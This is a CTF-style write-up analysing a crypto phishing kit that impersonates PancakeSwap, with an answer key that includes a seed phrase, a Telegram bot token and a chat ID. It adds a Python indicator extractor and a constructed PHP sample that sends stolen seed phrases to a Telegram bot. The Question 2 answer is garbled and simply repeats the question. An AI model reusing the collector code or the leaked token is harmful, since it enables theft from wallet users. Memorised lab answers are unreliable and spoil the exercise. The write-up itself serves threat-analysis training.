# GrabThePhisher Write-up

Praise be to God, and peace and blessings be upon the Messenger of God and upon his family and companions. Now then:

## Instructions: <a href="#id-6876" id="id-6876"></a>

* Uncompress the lab (pass: [**cyberdefenders.org**](http://cyberdefenders.org/))

## Scenario: <a href="#id-7eb8" id="id-7eb8"></a>

An attacker compromised a server and impersonated <https://pancakeswap.finance/>, a decentralized exchange native to BNB Chain, to host a phishing kit at <https://apankewk.soup.xyz/mainpage.php>. The attacker set it as an open directory with the file name “pankewk.zip”.

Provided the phishing kit, you, as a SOC analyst, are requested to analyze it and do your threat intel homework.

Link: <https://cyberdefenders.org/blueteam-ctf-challenges/grabthephisher/>

Medium: <https://medium.com/@GLITCHGC/grabthephisher-write-up-b99849f18a73>

***

## Questions: <a href="#id-67cf" id="id-67cf"></a>

### 1. Which wallet is used for asking the seed phrase? <a href="#id-8ffd" id="id-8ffd"></a>

After downloading the zip file, you will notice an index.html file; open it.

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*ru1QEdSae5RmfOswNiqvpA.png" alt="" height="234" width="700"><figcaption></figcaption></figure>

The answer is the first wallet listed, which corresponds to the folder named after it in the zip file.

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*TGCs5Loi9ALRBwM21hQ7DQ.png" alt="" height="401" width="700"><figcaption></figcaption></figure>

> **Answer: Metamask**

***

### 2. What is the file name that has the code for the phishing kit? <a href="#id-99d8" id="id-99d8"></a>

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*NzOZrXJJerTX5oUeaJ9sww.png" alt="" height="140" width="700"><figcaption></figcaption></figure>

> **Answer: What is the file name that has the code for the phishing kit?**

***

### 3. In which language was the kit written? <a href="#e546" id="e546"></a>

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*NzOZrXJJerTX5oUeaJ9sww.png" alt="" height="140" width="700"><figcaption></figcaption></figure>

> **Answer: PHP**

***

### 4. What service does the kit use to retrieve the victim’s machine information? <a href="#id-7a52" id="id-7a52"></a>

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*oyiRc9rprqrqA9JjQ9cuBw.png" alt="" height="350" width="700"><figcaption></figcaption></figure>

> **Answer: Sypex Geo**

***

### 5. How many seed phrases were already collected? <a href="#id-4793" id="id-4793"></a>

<figure><img src="https://miro.medium.com/v2/resize:fit:674/1*3woCBDYjhvPirH_NtjNGaA.png" alt="" height="138" width="674"><figcaption></figcaption></figure>

> **Answer: 3**

***

### 6. Write down the seed phrase of the most recent phishing incident? <a href="#d6e2" id="d6e2"></a>

<figure><img src="https://miro.medium.com/v2/resize:fit:674/1*3woCBDYjhvPirH_NtjNGaA.png" alt="" height="138" width="674"><figcaption></figcaption></figure>

> **Answer: father also recycle embody balance concert mechanic believe owner pair muffin hockey**

***

### 7. Which medium had been used for credential dumping? <a href="#id-0be7" id="id-0be7"></a>

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*srdErlrRRkv5zmMjNAnVbA.png" alt="" height="394" width="700"><figcaption></figcaption></figure>

> **Answer: Telegram**

***

### 8. What is the token for the channel? <a href="#id-7554" id="id-7554"></a>

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*QsCD4CyML4NJ3Hx6t-3KUg.png" alt="" height="394" width="700"><figcaption></figcaption></figure>

> **Answer: 5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10**

***

### 9. What is the chat ID of the phisher’s channel? <a href="#id-6c6e" id="id-6c6e"></a>

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*NBfFOw79e7vBg-L3Okd8uA.png" alt="" height="394" width="700"><figcaption></figcaption></figure>

> **Answer: 5442785564**

***

### 10. What are the allies of the phish kit developer? <a href="#id-9b60" id="id-9b60"></a>

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*rhOaN1Jx8_V6cFIdjE6zrQ.png" alt="" height="394" width="700"><figcaption></figcaption></figure>

> **Answer: j1j1b1s\@m3r0**

***

### 11. What is the full name of the Phish Actor? <a href="#id-7e68" id="id-7e68"></a>

<figure><img src="https://miro.medium.com/v2/resize:fit:369/1*3jQm-u_ogkgY-nBZynvK3A.png" alt="" height="251" width="369"><figcaption></figcaption></figure>

Query the Telegram Bot API with the recovered token and chat ID to get the answers: <https://api.telegram.org/bot5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10/getChat?chat_id=5442785564>

> **Answer: Marcus Aurelius**
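The indicators pulled by hand in Q4, Q7-Q9 and Q11 (geolocation library, Telegram bot token, chat ID, Bot API endpoint) can be extracted from a kit's PHP files programmatically. The following is an added example, not code from the kit or from this write-up; the PHP sample it parses is constructed and its token and chat ID are fake placeholders.

```python
# Added triage helper (not the kit's own code); the PHP sample below is constructed.
import re
from typing import Dict

# Telegram bot tokens have the shape "<numeric bot id>:<35-char secret>".
TOKEN_RE = re.compile(r"\b(\d{8,10}:[A-Za-z0-9_-]{35})\b")
# The chat id is a literal assigned to $chat_id or appended as chat_id=<digits>;
# supergroup ids are negative.
CHAT_ID_RE = re.compile(r"chat_id\W{1,6}(-?\d{6,14})", re.I)
# Sypex Geo ships as SxGeo.php and is used through the SxGeo class.
SXGEO_RE = re.compile(r"\bSxGeo\b", re.I)
EXFIL_RE = re.compile(r"https?://api\.telegram\.org/bot[^'\"\s]*", re.I)

def extract_indicators(php_source: str) -> Dict[str, object]:
    """Return tokens, chat ids, Bot API URLs and a Sypex Geo flag for one PHP file."""
    return {
        "tokens": sorted(set(TOKEN_RE.findall(php_source))),
        "chat_ids": sorted(set(CHAT_ID_RE.findall(php_source))),
        "exfil_urls": sorted(set(EXFIL_RE.findall(php_source))),
        "uses_sypex_geo": bool(SXGEO_RE.search(php_source)),
    }

def getchat_url(token: str, chat_id: str) -> str:
    """Bot API call from Q11; anyone holding the token can make it, so a leaked token is an IOC."""
    return f"https://api.telegram.org/bot{token}/getChat?chat_id={chat_id}"

def redact_token(token: str) -> str:
    """Keep the searchable bot id, hide the secret when writing reports."""
    bot_id, _secret = token.split(":", 1)
    return f"{bot_id}:<redacted>"

# Constructed PHP resembling a seed-phrase collector; all values are fake.
SAMPLE_PHP = r'''<?php
include_once "SxGeo/SxGeo.php";
$SxGeo = new SxGeo("SxGeo/SxGeoCity.dat");
$city = $SxGeo->getCityFull($_SERVER["REMOTE_ADDR"]);
$token = "1234567890:AAExamplePlaceholderToken_012345678";
$chat_id = "9876543210";
$text = urlencode("Seed: " . $_POST["seed"] . " | " . $city["country"]["iso"]);
file_get_contents("https://api.telegram.org/bot$token/sendMessage?chat_id=$chat_id&text=$text");
?>'''

if __name__ == "__main__":
    iocs = extract_indicators(SAMPLE_PHP)
    print("bot tokens:", [redact_token(t) for t in iocs["tokens"]])
    print("chat ids:", iocs["chat_ids"], "| Sypex Geo:", iocs["uses_sypex_geo"])
```

Running it over every `.php` file in the unpacked kit gives the same token and chat ID the screenshots show, ready to be reported as indicators.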

***

### 12. What is the username of the Phish Actor? <a href="#id-748d" id="id-748d"></a>

<figure><img src="https://miro.medium.com/v2/resize:fit:470/1*Wtds2CdvTkJGO33Gir_Gpw.png" alt="" height="264" width="470"><figcaption></figcaption></figure>

> **Answer: pumpkinboii**

***

## You Can Find me Here! <a href="#d59b" id="d59b"></a>

Blog: <https://g1it0h.gitbook.io/glitch/>

Linkedin: <https://www.linkedin.com/in/glitchgc/>

Facebook: <https://www.facebook.com/GLITC.GC/>

Tryhackme: <https://tryhackme.com/p/GLITCH1GC>
